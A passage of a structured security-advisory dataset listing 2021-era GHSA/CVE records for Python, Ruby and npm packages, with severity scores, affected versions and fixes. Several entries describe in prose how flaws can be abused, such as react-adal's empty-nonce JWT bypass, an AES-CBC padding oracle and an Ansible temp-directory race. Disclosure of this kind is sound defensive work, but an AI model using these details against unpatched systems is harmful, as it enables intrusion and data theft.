'https://nvd.nist.gov/vuln/detail/CVE-2021-28965'}, {'type': 'WEB', 'url': 'https://github.com/ruby/rexml/commit/2fe62e29094d95921d7e19abbd2e26b23d78dc5b'}, {'type': 'WEB', 'url': 'https://github.com/ruby/rexml/commit/3c137eb119550874b2b3e27d12b733ca67033377'}, {'type': 'WEB', 'url': 'https://github.com/ruby/rexml/commit/6a250d2cd1194c2be72becbdd9c3e770aa16e752'}, {'type': 'WEB', 'url': 'https://github.com/ruby/rexml/commit/9b311e59ae05749e082eb6bbefa1cb620d1a786e'}, {'type': 'WEB', 'url': 'https://github.com/ruby/rexml/commit/a659c63e37414506dfb0d4655e031bb7a2e73fc8'}, {'type': 'WEB', 'url': 'https://github.com/ruby/rexml/commit/f7bab8937513b1403cea5aff874cbf32fd5e8551'}, {'type': 'WEB', 'url': 'https://github.com/ruby/rexml/commit/f9d88e4948b4a43294c25dc0edb16815bd9d8618'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/1104077'}, {'type': 'PACKAGE', 'url': 'https://github.com/ruby/rexml'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rexml/CVE-2021-28965.yml'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WTVFTLFVCSUE5CXHINJEUCKSHU4SWDMT/'}, {'type': 'WEB', 'url': 'https://rubygems.org/gems/rexml'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210528-0003/'}, {'type': 'WEB', 'url': 'https://www.ruby-lang.org/en/news/2021/04/05/xml-round-trip-vulnerability-in-rexml-cve-2021-28965/'}]","{'cwe_ids': ['CWE-115', 'CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-22T16:31:39Z', 'nvd_published_at': '2021-04-21T07:15:00Z'}" +1.4.0,GHSA-58c7-px5v-82hh,2023-03-30T14:48:14Z,2021-04-06T17:28:59Z,,['CVE-2021-21416'],Potential sensitive information disclosed in error reports,"django-registration is a user-registration application for Django. + +### Impact + +The django-registration package provides tools for implementing user-account registration flows in the Django web framework. In django-registration prior to 3.1.2, the base user-account registration view did not properly apply filters to sensitive data, with the result that sensitive data could be included in error reports rather than removed automatically by Django. + +Triggering this requires the following conditions: + +* A site is using django-registration < 3.1.2 +* The site has detailed error reports (such as Django's [emailed error reports to site staff/developers](https://docs.djangoproject.com/en/3.1/howto/error-reporting/#email-reports)) enabled +* A server-side error (HTTP 5xx) occurs during an attempt by a user to register an account + +Under these conditions, recipients of the detailed error report will see all submitted data from the account-registration attempt, which may include the user's proposed credentials (such as a password). + +### Patches + +As of version 3.1.2, django-registration properly applies Django's `sensitive_post_parameters()` decorator to the base user-registration view, which will cause all data from the HTTP request body to be filtered from detailed error reports in the event of a server-side crash during user account registration. + +Note that as applied, this filters *all* HTTP request data from error reports. To selectively allow some fields but not others, see Django's own documentation (in references) and the notes below for how to apply `sensitive_post_parameters()` manually to a particular codebase's `RegistrationView` subclass(es). + +### Workarounds + +Users who cannot upgrade quickly can apply the `django.views.decorators.debug.sensitive_post_parameters()` decorator to their own registration views. The decorator should be applied on the `dispatch()` method of the appropriate `RegistrationView` class, using Django's `method_decorator()` helper. For example: + +```python +from django.utils.decorators import method_decorator +from django.views.decorators.debug import sensitive_post_parameters + +from django_registration.views import RegistrationView + +class MyRegistrationView(RegistrationView): + """""" + A RegistrationView subclass manually protected against sensitive information disclosure + in error reports. + + """""" + @method_decorator(sensitive_post_parameters()) + def dispatch(self, *args, **kwargs): + return super().dispatch(*args, **kwargs) +``` + +### References + +* Django's documentation on [error reporting in production](https://docs.djangoproject.com/en/3.1/howto/error-reporting/) +* [How Django's sensitive-data filters work](https://docs.djangoproject.com/en/3.1/howto/error-reporting/#filtering-error-reports)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'django-registration'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ubernostrum/django-registration/security/advisories/GHSA-58c7-px5v-82hh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21416'}, {'type': 'WEB', 'url': 'https://github.com/ubernostrum/django-registration/commit/2db0bb7ec35636ea46b07b146328b87b2cb13ca5'}, {'type': 'PACKAGE', 'url': 'https://github.com/ubernostrum/django-registration'}]","{'cwe_ids': ['CWE-201', 'CWE-209'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-04-01T21:03:08Z', 'nvd_published_at': '2021-04-01T22:15:00Z'}" +1.4.0,GHSA-ph32-23p8-9rw5,2021-07-28T18:30:26Z,2021-04-13T15:17:45Z,,['CVE-2019-10786'],Improper Input Validation in network-manager,"network-manager through 1.0.2 allows remote attackers to execute arbitrary commands via the ""execSync()"" argument.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'network-manager'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10786'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-NETWORKMANAGER-544035'}]","{'cwe_ids': ['CWE-20', 'CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-29T22:36:25Z', 'nvd_published_at': '2020-02-04T21:15:00Z'}" +1.4.0,GHSA-78vq-9j56-wrfr,2023-08-29T12:13:04Z,2021-04-30T17:29:15Z,,['CVE-2020-25739'],Gon gem lack of escaping certain input when outputting as JSON,"An issue was discovered in the gon gem before gon-6.4.0 for Ruby. MultiJson does not honor the escape_mode parameter to escape fields as an XSS protection mechanism. To mitigate, json_dumper.rb in gon now does escaping for XSS by default without relying on MultiJson.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'gon'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25739'}, {'type': 'WEB', 'url': 'https://github.com/gazay/gon/commit/fe3c7b2191a992386dc9edd37de5447a4e809bc7'}, {'type': 'PACKAGE', 'url': 'https://github.com/gazay/gon'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/gon/CVE-2020-25739.yml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/09/msg00018.html'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4560-1/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-28T15:05:22Z', 'nvd_published_at': '2020-09-23T14:15:00Z'}" +1.4.0,GHSA-r96p-v3cr-gfv8,2021-07-29T20:42:20Z,2021-04-13T15:28:01Z,,['CVE-2020-28470'],Cross-site Scripting (XSS) in @scullyio/scully,This affects the package @scullyio/scully before 1.0.9. The transfer state is serialised with the JSON.stringify() function and then written into the HTML page.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': '@scullyio/scully'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28470'}, {'type': 'WEB', 'url': 'https://github.com/scullyio/scully/pull/1182'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-SCULLYIOSCULLY-1055829'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T21:40:15Z', 'nvd_published_at': '2021-01-14T10:15:00Z'}" +1.4.0,GHSA-gqvf-892r-vjm5,2023-07-05T19:26:32Z,2021-04-13T15:42:19Z,,['CVE-2020-7942'],Improper Certificate Validation in Puppet,"Previously, Puppet operated on the model that a node with a valid certificate was entitled to all information in the system and that a compromised certificate allowed access to everything in the infrastructure. When a node's catalog falls back to the `default` node, the catalog can be retrieved for a different node by modifying facts for the Puppet run. This issue can be mitigated by setting `strict_hostname_checking = true` in `puppet.conf` on your Puppet master. Puppet 6.13.0 changes the default behavior for strict_hostname_checking from false to true. It is recommended that Puppet Open Source and Puppet Enterprise users that are not upgrading still set strict_hostname_checking to true to ensure secure behavior.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'puppet'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.13.0'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'puppet'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.5.19'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7942'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/puppet/CVE-2020-7942.yml'}, {'type': 'WEB', 'url': 'https://puppet.com/security/cve/CVE-2020-7942/'}]","{'cwe_ids': ['CWE-295'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-07T23:15:22Z', 'nvd_published_at': '2020-02-19T21:15:00Z'}" +1.4.0,GHSA-72rj-36qc-47g7,2023-08-25T22:09:00Z,2021-04-27T15:54:52Z,,['CVE-2021-31671'],Pgsync Contains Cleartext Transmission of Sensitive Information,"pgsync before 0.6.7 is affected by Information Disclosure of sensitive information. Syncing the schema with the `--schema-first` and `--schema-only` options is mishandled. For example, the sslmode connection parameter may be lost, which means that SSL would not be used.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'pgsync'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31671'}, {'type': 'WEB', 'url': 'https://github.com/ankane/pgsync/issues/121'}, {'type': 'WEB', 'url': 'https://github.com/ankane/pgsync/commit/05cd18f5fc09407e4b544f2c12f819cabc50c40e'}, {'type': 'WEB', 'url': 'https://github.com/ankane/pgsync/blob/master/CHANGELOG.md#067-2021-04-26'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/pgsync/CVE-2021-31671.yml'}]","{'cwe_ids': ['CWE-319'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-27T15:54:16Z', 'nvd_published_at': '2021-04-27T03:15:00Z'}" +1.4.0,GHSA-333x-qr3v-g4xx,2021-04-05T19:04:46Z,2021-04-13T15:30:16Z,,['CVE-2020-7782'],Command injection in spritesheet-js,"This affects all versions of package spritesheet-js. It depends on a vulnerable package platform-command. The injection point is located in line 32 in lib/generator.js, which is triggered by main entry of the package.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'spritesheet-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.2.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7782'}, {'type': 'WEB', 'url': 'https://github.com/krzysztof-o/spritesheet.js/blob/master/lib/generator.js#23L32'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-SPRITESHEETJS-1048333'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/spritesheet-js'}]","{'cwe_ids': ['CWE-74'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-05T19:04:46Z', 'nvd_published_at': '2021-02-08T19:15:00Z'}" +1.4.0,GHSA-9jhm-8m8c-c3f4,2021-04-15T21:00:29Z,2021-04-19T14:54:15Z,,['CVE-2021-29431'],SSRF in Sydent due to missing validation of hostnames,"### Impact + +Sydent can be induced to send HTTP GET requests to internal systems, due to lack of parameter validation or IP address blacklisting. + +It is not possible to exfiltrate data or control request headers, but it might be possible to use the attack to perform an internal port enumeration. + +### Patches + +Fixed in 9e57334, 8936925, 3d531ed, 0f00412 + +### Workarounds + +A potential workaround would be to use a firewall to ensure that Sydent cannot reach internal HTTP resources. + +### For more information + +If you have any questions or comments about this advisory, email us at security@matrix.org.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'matrix-sydent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/sydent/security/advisories/GHSA-9jhm-8m8c-c3f4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29431'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/sydent/commit/0f00412017f25619bc36c264b29ea96808bf310a'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/sydent/commit/3d531ed50d2fd41ac387f36d44d3fb2c62dd22d3'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/sydent/commit/8936925f561b0c352c2fa922d5097d7245aad00a'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/sydent/commit/9e573348d81df8191bbe8c266c01999c9d57cd5f'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/sydent/releases/tag/v2.3.0'}, {'type': 'WEB', 'url': 'https://pypi.org/project/matrix-sydent/'}]","{'cwe_ids': ['CWE-20', 'CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-15T21:00:29Z', 'nvd_published_at': '2021-04-15T21:15:00Z'}" +1.4.0,GHSA-7mpx-vg3c-cmr4,2021-04-09T19:38:58Z,2021-04-13T15:22:37Z,,['CVE-2020-7787'],Improper Authentication in react-adal,"This affects versions of react-adal < 0.5.1. It is possible for a specially crafted JWT token and request URL can cause the nonce, session and refresh values to be incorrectly validated, causing the application to treat an attacker-generated JWT token as authentic. The logical defect is caused by how the nonce, session and refresh values are stored in the browser local storage or session storage. Each key is automatically appended by ||. When the received nonce and session keys are generated, the list of values is stored in the browser storage, separated by ||, with || always appended to the end of the list. Since || will always be the last 2 characters of the stored values, an empty string ("""") will always be in the list of the valid values. Therefore, if an empty session parameter is provided in the callback URL, and a specially-crafted JWT token contains an nonce value of """" (empty string), then adal.js will consider the JWT token as authentic.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'react-adal'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7787'}, {'type': 'WEB', 'url': 'https://github.com/salvoravida/react-adal/pull/115'}, {'type': 'WEB', 'url': 'https://github.com/salvoravida/react-adal/commit/74158dba1647b12fe96fa401e306a6287fe9e2a9'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-REACTADAL-1018907'}]","{'cwe_ids': ['CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-09T19:38:58Z', 'nvd_published_at': '2020-12-09T17:15:00Z'}" +1.4.0,GHSA-4v4g-726h-xvfv,2023-03-17T17:49:46Z,2021-04-19T14:59:06Z,,['CVE-2021-29445'],Padding Oracle Attack due to Observable Timing Discrepancy in jose-node-esm-runtime,"### Impact + +[AES_CBC_HMAC_SHA2 Algorithm](https://tools.ietf.org/html/rfc7518#section-5.2) (A128CBC-HS256, A192CBC-HS384, A256CBC-HS512) decryption would always execute both HMAC tag verification and CBC decryption, if either failed `JWEDecryptionFailed` would be thrown. But a possibly observable difference in timing when padding error would occur while decrypting the ciphertext makes a padding oracle and an adversary might be able to make use of that oracle to decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block). + +### Patches + +A patch was released which ensures the HMAC tag is verified before performing CBC decryption. The fixed versions are `>=3.11.4`. + +Users should upgrade to `^3.11.4`. + +### Credits +Thanks to Morgan Brown of Microsoft for bringing this up and Eva Sarafianou (@esarafianou) for helping to score this advisory.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'jose-node-esm-runtime'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.11.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/panva/jose/security/advisories/GHSA-4v4g-726h-xvfv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29445'}, {'type': 'PACKAGE', 'url': 'https://github.com/panva/jose'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/jose-node-esm-runtime'}]","{'cwe_ids': ['CWE-203', 'CWE-208', 'CWE-696'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:00:41Z', 'nvd_published_at': '2021-04-16T22:15:00Z'}" +1.4.0,GHSA-893h-35v4-mxqx,2023-08-31T20:01:05Z,2021-04-20T16:43:33Z,,['CVE-2020-1737'],Path Traversal in Ansible,"A flaw was found in Ansible 2.7.17 and prior, 2.8.9 and prior, and 2.9.6 and prior when using the Extract-Zip function from the win_unzip module as the extracted file(s) are not checked if they belong to the destination folder. An attacker could take advantage of this flaw by crafting an archive anywhere in the file system, using a path traversal. This issue is fixed in 2.10.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.18'}]}], 'database_specific': {'last_known_affected_version_range': '< 2.7.17'}}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.10'}]}], 'database_specific': {'last_known_affected_version_range': '< 2.8.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.7'}]}], 'database_specific': {'last_known_affected_version_range': '< 2.9.6'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1737'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/issues/67795'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/pull/67799'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1737'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FWDK3QUVBULS3Q3PQTGEKUQYPSNOU5M3/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QT27K5ZRGDPCH7GT3DRI3LO4IVDVQUB7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U3IMV3XEIUXL6S4KPLYYM4TVJQ2VNEP2/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202006-11'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-05T18:58:06Z', 'nvd_published_at': '2020-03-09T16:15:00Z'}" +1.4.0,GHSA-g4mq-6fp5-qwcf,2021-08-31T21:10:23Z,2021-04-20T16:46:12Z,,['CVE-2020-1733'],Exposure of Resource to Wrong Sphere and Insecure Temporary File in Ansible,"A race condition flaw was found in Ansible Engine 2.7.17 and prior, 2.8.9 and prior, 2.9.6 and prior when running a playbook with an unprivileged become user. When Ansible needs to run a module with become user, the temporary directory is created in /var/tmp. This directory is created with ""umask 77 && mkdir -p ""; this operation does not fail if the directory already exists and is owned by another user. An attacker could take advantage to gain control of the become user as the target directory can be retrieved by iterating '/proc//cmdline'.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.7.17'}}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.10'}]}], 'database_specific': {'last_known_affected_version_range': '< 2.8.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.7'}]}], 'database_specific': {'last_known_affected_version_range': '< 2.9.6'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1733'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/issues/67791'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1733'}, {'type': 'PACKAGE', 'url': 'https://github.com/ansible/ansible'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/05/msg00005.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DKPA4KC3OJSUFASUYMG66HKJE7ADNGFW/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MRRYUU5ZBLPBXCYG6CFP35D64NP2UB2S/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WQVOQD4VAIXXTVQAJKTN7NUGTJFE2PCB/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202006-11'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4950'}]","{'cwe_ids': ['CWE-362', 'CWE-377', 'CWE-668'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-05T18:50:43Z', 'nvd_published_at': '2020-03-11T19:15:00Z'}" +1.4.0,GHSA-x823-j7c4-vpc5,2023-08-30T22:10:24Z,2021-04-20T16:31:43Z,,['CVE-2021-25926'],Cross-site scripting in sickrage,"In SiCKRAGE, versions 9.3.54.dev1 to 10.0.11.dev1 are vulnerable to Reflected Cross-Site-Scripting (XSS) due to user input not being validated properly in the `quicksearch` feature. Therefore, an attacker can steal a user's sessionID to masquerade as a victim user, to carry out any actions in the context of the user.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'sickrage'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.3.54'}, {'fixed': '10.0.11.dev2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 10.0.11.dev1'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25926'}, {'type': 'WEB', 'url': 'https://github.com/SiCKRAGE/SiCKRAGE/commit/9f42426727e16609ad3d1337f6637588b8ed28e4'}, {'type': 'PACKAGE', 'url': 'https://github.com/SiCKRAGE/SiCKRAGE'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25926,'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-13T20:57:46Z', 'nvd_published_at': '2021-04-12T14:15:00Z'}" +1.4.0,GHSA-375m-5fvv-xq23,2021-04-16T23:17:39Z,2021-04-19T15:11:54Z,,[],VVE-2021-0002: Incorrect `returndatasize` when using simple forwarder proxies deployed prior to EIP-1167 adoption,"## Background + +@tjayrush reported a data handling issue with certain Web3 libraries using Vyper-deploy forwarder proxy contracts using our Vyper's built-in `create_forwarder_to` function prior to our change to support EIP-1167 style forwarder proxies. + +### Impact +If you are an end user of a forwarder-style proxy deployed using Vyper's built-in `create_forwarder_to` function AND you have a function that returns >4096 bytes AND you do no return data sanitation on the value returned, you could potentially see a data corruption issue. + +Otherwise, if you are handling the result of a return call AND you expect a specific `RETURNDATASIZE` that is less than 4096 (such as `SafeERC20.safeTransfer`) then the call will fail that check. + +### Patches +The issue was patched when we upgraded to EIP-1167 style forwarder proxies in #2281. + +### Workarounds +If you are making a call to a contract method that is expected to return <= 4096 bytes, there is no issue as the ABI decoders in both Solidity and Vyper will truncate the data properly. Web3 libraries will also do this, unless you are doing `eth_call` or `eth_sendTransaction` directly. + +If you are using a Solidity library that checks `RETURNDATASIZE` of an external call to a forwarder proxy deployed prior to this patch, it will fail on that assertion (such as `SafeERC20.safeTransfer`). The workaround is to always do a greater than or equal to check, rather than a strict equals to check.",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'vyper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/security/advisories/GHSA-375m-5fvv-xq23'}, {'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/pull/2281'}, {'type': 'WEB', 'url': 'https://pypi.org/project/vyper/'}]","{'cwe_ids': ['CWE-20'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:17:39Z', 'nvd_published_at': None}" +1.4.0,GHSA-wq6x-g685-w5f2,2021-04-07T19:34:40Z,2021-04-07T21:13:00Z,,['CVE-2020-28734'],Improper Restriction of XML External Entity Reference in Plone,Plone before 5.2.3 allows XXE attacks via a feature that is explicitly only available to the Manager role.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Plone'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'plone.app.event'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.10'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'plone.app.theming'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.6'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'plone.app.dexterity'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.8'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'plone.supermodel'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28734'}, {'type': 'WEB', 'url': 'https://github.com/plone/Products.CMFPlone/issues/3209'}, {'type': 'WEB', 'url': 'https://dist.plone.org/release/5.2.3/RELEASE-NOTES.txt'}]","{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-07T19:34:40Z', 'nvd_published_at': '2020-12-30T19:15:00Z'}" +1.4.0,GHSA-p7jq-v8jp-j424,2021-04-16T23:15:49Z,2021-04-19T14:50:38Z,,['CVE-2021-31406'],Timing side channel vulnerability in endpoint request handler in Vaadin 15-19,"Non-constant-time comparison of CSRF tokens in endpoint request handler in `com.vaadin:flow-server` versions 3.0.0 through 5.0.3 (Vaadin 15.0.0 through 18.0.6), and com.vaadin:fusion-endpoint version 6.0.0 (Vaadin 19.0.0) allows attacker to guess a security token for Fusion endpoints via timing attack. + +- https://vaadin.com/security/cve-2021-31406","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 